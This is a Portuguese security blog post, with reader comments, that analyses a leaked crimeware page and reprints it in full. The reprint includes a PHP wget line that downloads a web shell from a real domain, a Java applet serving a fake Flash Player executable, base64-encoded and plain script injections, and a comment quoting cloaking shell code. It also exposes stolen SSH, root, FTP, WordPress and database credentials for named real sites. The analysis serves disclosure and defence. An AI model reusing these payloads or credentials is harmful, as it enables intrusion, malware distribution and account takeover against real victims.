Recentemente um leitor do blog me enviou um link muito suspeito para análise, ao acessá-lo abriu essa página:
Agora vá ao Google, digite por exemplo “python pyFTP.py -i Ftp.txt” com aspas e mande pesquisar (não abra os sites encontrados).
Hoje, o Google retornou mais de 14 mil sites com essas mesmas informações. Aqui estão elas na íntegra:
<? exec("wget http://rafaeltongol.com/2.txt;mv 2.txt wp-word.php"); ?>
<applet name="Flash Player 11" code="afp.class" archive="http://66.49.154.203/usage/.jar/java.php?a=afp.jar" width="1" height="1"><param name="link" value="http://66.49.154.203/usage/.exe/download.php?a=FlashPlay.exe"></applet>
<? $auto_confi = base64_decode('PHNjcmlwdCBzcmM9Imh0dHA6Ly9hbGluZXJvaWZmZS5jb20vc2l0ZS9wbHVnaW4uanMiPjwvc2Ny
aXB0Pg==');
echo $auto_confi;?>
<script src="http://alineroiffe.com/site/plugin.js"></script>
<script src="http://atelier3.jp/js/java.js"></script>
allcompanyonline.com:allcompanyonline:admin123
python pyFTP.py -i Ftp.txt -e OK_Ftps.txt -t auto.txt -o Alterados.txt -l 8634
alineroiffe.com:alineroiffe:senha123
atelier3.jp:atelier3:atelier3
Linux ubuntu-server.entvoice.com 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@123.252.144.92 3k0(#09@8u@xm2
$P$B6yZv1TLwMlV9rZxXrjFW6oNO4AU5G/ = %%hacking%%
rafaeltongol.com:rafaeltongol:upload DEDICADO
ssh root@knihovna.tul.cz:Hacked1990
ssh apilecce@apilecce.it:apilecce
ssh akce@akce.cz:akce Scan Wordpress lol.log 1890018
ssh autimax@autimax.com.br:q1w2e3 Scan Token Joomla lol.log 2116824 OFF
ssh aurora@aurora.iiitm.ac.in:qwerty123 Scan Joomla Brute lol.log 6692945 OFF
ssh cba@cba.uah.edu:password Scan FTP Brs.txt 169700 OFF
ssh cupnoodles@cupnoodles.com.br:q1w2e3 Scan Ftp Completo lol.log 1905797 + 500
ssh baigiang@baigiang.bachkim.vn:baigiang Scan Brs.txt Joomla TOKEN 520352
=====================================================================================================================
............::::::::: Porrinha ::::::::...........
=====================================================================================================================
Contador .HTTP: http://anfeso1201.dominiotemporario.com/contadorkeke/clientes/mostrar.php Total: 559
Data: 28/09/2011
=====================================================================================================================
Contador .HTTP: http://r7on.com.br/porraloka/clientes/mostrar.php Total: 1671
31/08/2011
=====================================================================================================================
Contador .HTTP: http://netransportes.com.br/amanda/clientes/mostrar.php Total: 2000
07/09/2011
=====================================================================================================================
TOTAL INFECTS: 00.000 x 0,50 = 000,00
=====================================================================================================================
=====================================================================================================================
.....:::: Psychlo ::::......
=====================================================================================================================
Total Combinado: 1000
Contador HTTP: http://64.186.158.114/tzu.php Total: 1000
Falta pagar:250,00
=====================================================================================================================
Total: 2214,00 Vo manda 3000,00 EM AVER 786,00 - 250 = 536
====================================================================================================================
............::::::::: Cavalo ::::::::...........
====================================================================================================================
Contador .EXE : 2053
====================================================================================================================
TOTAL INFECTS: 5.000 x 0,50 = 000,00
====================================================================================================================
Contador HTTP: http://200.98.201.13/~rex/tom/rel/inf4/?url=c Total: 3758
Falta pagar: 600,00
http://beta.statcounter.com/p7142950/entry_page/pageload/?url=http://www.cc.com/d.php
flashgame_co_cc
b470killer
miroslav.stampar@gmail.com Carinha do wordpress
8276 0241 Oi julimar
http://assistironlinefilme.com/wp-login.php:admin:123456 root User
http://www.assistironlinefilme.com/wp-word.php
define('DB_NAME', 'assisti2_wrdp1');
/** MySQL database username */
define('DB_USER', 'assisti2_wrdp1');
/** MySQL database password */
define('DB_PASSWORD', 'hIoGTSY8JGg6');
/** MySQL hostname */
define('DB_HOST', 'localhost');
http://assistirtvonline.com/wp-login.php:admin:123mudar Usuario admin email: gatao1593@hotmail.com root Email: nobody_linux@hush.ai
http://www.assistirtvonline.com/wp-content/themes/theme/wp-word.php
http://www.assistirtvonline.com/wp-content/cache/supercache/www.assistirtvonline.com/aovivo/pica-pau/worse.php
http://www.assistirtvonline.com/wp-content/cache/supercache/assistirtvonline.com./index_.php
http://www.assistirtvonline.com/aovivo.php
/** The name of the database for WordPress */
define('DB_NAME', 'assisti_01');
/** MySQL database username */
define('DB_USER', 'assisti_assisti');
/** MySQL database password */
define('DB_PASSWORD', '1903divina');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** The name of the database for WordPress */
define('DB_NAME', 'paraorku_db');
/** MySQL database username */
define('DB_USER', 'paraorku_Admin');
/** MySQL database password */
define('DB_PASSWORD', 'Clarity123-db');
/** MySQL hostname */
define('DB_HOST', 'localhost');
http://cultureba.com.br/wp-content/themes/theme/wp-word.php
http://cultureba.com.br/wp-words.php
define('DB_NAME', 'cultureb_cultureba');
/** MySQL database username */
define('DB_USER', 'cultureb_culture');
/** MySQL database password */
define('DB_PASSWORD', 'jana2810##');
/** MySQL hostname */
define('DB_HOST', 'localhost');
define('DB_NAME', 'chatfeminino');
/** MySQL database username */
define('DB_USER', 'chatfeminino');
/** MySQL database password */
define('DB_PASSWORD', 'moda102030');
/** MySQL hostname */
define('DB_HOST', 'mysql.chat-feminino.com');
A princípio o que me chama atenção é que tentaram inserir códigos da linguagem PHP em páginas que não eram PHP, sendo assim o servidor web não conseguiu interpretar os códigos e os trataram como se fossem texto simples.
Outros trechos que não contêm as tags do PHP <? e ?> também exibem informações dos crackers. Nesse caso imagino que foi falha da ferramenta ou o método que utilizaram, devem ter redirecionado a saída de algum comando para a página ao invés de outro arquivo de log por exemplo.
Ainda vemos informações contábeis dos golpes, isso me lembrou os caderninhos de contabilidade que são encontrados com os traficantes quando são apreendidos pela polícia, com informações de pagamentos, pedidos, apelidos e valores.
=================================================
.....:::: Psychlo ::::......
=================================================
Total Combinado: 1000
Contador HTTP: http://64.186.158.114/tzu.php Total: 1000
Falta pagar:250,00
=================================================
Total: 2214,00 Vo manda 3000,00 EM AVER 786,00 - 250 = 536
=================================================
............::::::::: Cavalo ::::::::...........
=================================================
Contador .EXE : 2053
=================================================
TOTAL INFECTS: 5.000 x 0,50 = 000,00
=================================================
Contador HTTP: http://200.98.201.13/~rex/tom/rel/inf4/?url=c Total: 3758
Falta pagar: 600,00
=================================================
Lembram das páginas que os malwares acessam quando conseguem infectar um computador? São os contadores para realizarem esse controle da “firma”, parece que cada computador infectado está valendo R$ 0,50.
Há até alguns dados para contato:
miroslav.stampar@gmail.com Carinha do wordpress
8276 0241 Oi julimar
Dessa vez decidi não esconder as informações porque elas estão disponíveis na internet para qualquer um ver e além disso eles não gostam de vazar dados sigilosos? Aí estão para apreciação.
Muita coisa pode ser extraída dessas informações, em breve novos posts com mais detalhes sobre o caso. Contribuições também são bem-vindas.
“Os maus exercem geralmente maior influência no mundo pela fraqueza dos bons. Os maus são intrigantes e audaciosos; os bons são tímidos. Estes, quando quiserem, assumirão a preponderância.”
Bom trabalho Ronaldo.
ResponderExcluirRealmente, algo deve ter corrido mal no toolkit de malware dos "crackers".
Também já apanhei uns quantos directórios de contadores sem protecção de index e dessa forma consegui obter logs bem interessantes :-)
Abraço,
David Sopas
http://amigos2rodas.web.interacesso.pt/
Excluirhttp://www2.genetiporc.com.br/
Olá Ronaldo,
ResponderExcluirPor que você diz para não acessar os sites encontrados? O que o acesso traz ao usuário?
Se você acessar, por exemplo, um servidor que foi alvo de crime, utilizando usuário e senha divulgado na web, você poderá ser objeto de investigação. E nestas horas, tratando-se de polícia brasileira, é bom lembrar que até você provar que fucinho de porco não é tomada, já levou muito choque.
ExcluirAlém disto, você pode comprometer a segurança de seu equipamento, se acessar de forma comum tais endereços de páginas comprometidas.
Paulo
Mais um ótimo posts. Somos leitores assíduos.
ResponderExcluirMarcio Cavalheiro
@centralinfors
http://www.centralinfotecnologia.com.br
Anônimo,
ResponderExcluirPosso responder sua pergunta "O que o acesso traz ao usuário?"
Sim, faz download de programas maliciosos que infectam seu equipamento, e fazem o estrago!
;-)
Os programas só funcionam Windows?
ResponderExcluirNão, há artefatos maliciosos escritos em java que são ativados através do navegador (que alteram o comportamento da navegação, por exemplo), estando este em plataforma Windows ou Linux.
ExcluirPaulo
David, essa ausência de index sempre nos traz alegrias. Estou sempre acompanhando o websegura.net. :)
ResponderExcluirObrigado Marcio!
Anônimo[1], exatamente como o Anônimo[2] respondeu. Há scripts nesses sites que quando são acessados tentam instalar programas maliciosos no seu computador. Recomendo apenas abrir em um ambiente controlado de análise.
Anônimo[3], a princípio sim, geralmente instalam executáveis ou alteraram os navegadores somente no Windows. Mas também é bom ficar atento no Linux e Mac, assim como nos smartphones.
Abraços,
Como sempre, muito bom, tô sempre acompanhando...
ResponderExcluirTô esperando a próxima!!
Off: Só lembrando, não esqueça da minha dica sobre engenharia reversa.
Esqueci de citar, mas chegamos a você pelos tuitadas do @assolini
ResponderExcluirGrande Ronaldo!
ResponderExcluirExcelente!
Muito bom Ronaldo, parabéns. Alguns arquivos usados nessa fraude podem ser encontrados em http://66.49.154.203/usage/.exe/
ResponderExcluirAbraço! :D
Pra acrescentar, mais algumas informações:
ResponderExcluirAlguns dos sites que estavam (ou estão) distribuindo o malware em java:
delivery.etc.br
cooperinfo.com
avid.com.sg
nucleosocial.com.br
Comuniquei todos, porém, como de costume, somente o responsável por um site me respondeu, o do delivery.
Algumas screenshots do que encontrei:
Scan de "URLs online" rodando no site apilecce.it - a lista de sites que ele gerava provavelmente era usada pra eles escanear posteriomente em busca de alguma falha:
http://imageshack.us/photo/my-images/842/scanonline.png/
Contador de infects:
http://imageshack.us/photo/my-images/225/contadordeinfect2.png/
Exploits provavelmente usados pelos individuos para tentar fazer um privilege escalation (virar root) no server do japão (atelier3.jp):
http://imageshack.us/photo/my-images/695/exploits.png/
Arquivo java.js no atelier3 que chamava o malware do nucleosocial.com.br. Só pra constar, hoje (12/10/2011) o site do nucleosocial, cujo já foi comunicado sobre o artefato, ainda está distribuindo o malware... Triste, mas real!
http://imageshack.us/photo/my-images/33/javajs.png/
Mesmo arquivo que o de cima, porém no site alineroiffe:
http://imageshack.us/photo/my-images/818/pluginjs.png/
Esta fraude provavelmente fará parte do meu TCC da pós em segurança :D
Abraço galera!
Dae galera! Compilei mais algumas informações que encontrei sobre o caso e joguei na minha hospedagem pra não ficar gigante o post:
ResponderExcluirhttp://bertochi.com.br/files/informacoes_fraude.doc
Se descobrirem algo mais, compartilhem, e se eu descobrir algo mais, compartilho! :D
Abraço e fiquem com Deus <o/
Olá pessoal, Olá Ronaldo, quero deixa aqui meus parabéns pelo seu site. Cheguei aqui por indicação de um amigo e gostei muito dos post que vi aqui, gostaria de sabe como vc chego até as informações? Quando me refiro a informações falo que consegui achar senhas de acesso e senhas do ssh. Abraço e parabéns.
ResponderExcluirSo nesse link http://www.assistironlinefilme.com
ResponderExcluirAchei alguns host externo que possivelmente esta infectados.
baixakifilmeseseriados.net
feeds.feedburner.com
www.baixarfilmeseseriados.net
filmeparabaixar.org
www.roytanck.com
www.macromedia.com
seoforums.org
www.histats.com
sstatic1.histats.com
3.bp.blogspot.com
i54.tinypic.com
www.baixakifilmeseseriados.net
s10.histats.com
O código do shell revela a idade deles...
ResponderExcluir---
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
---
Brincadeiras à parte, é importante que essas informações sejam divulgadas e encaminhadas à polícia. São criminosos e precisam ir para a cadeia/reformatório.
Mandá-los para a cadeia não é problema Fernando, o problema é mantê-los lá. Não é justo o cidadão pagar impostos para manter aqueles lixos presos e ainda depois que saem eles seguirem com os delitos. Pena de morte é a solução para este tipo de crime, bem como para muitos outros (pedofilia, estupro, etc.)
ExcluirPaulo
"Dessa vez decidi não esconder as informações..."
ResponderExcluirParabéns pela iniciativa Ronaldo!
Paulo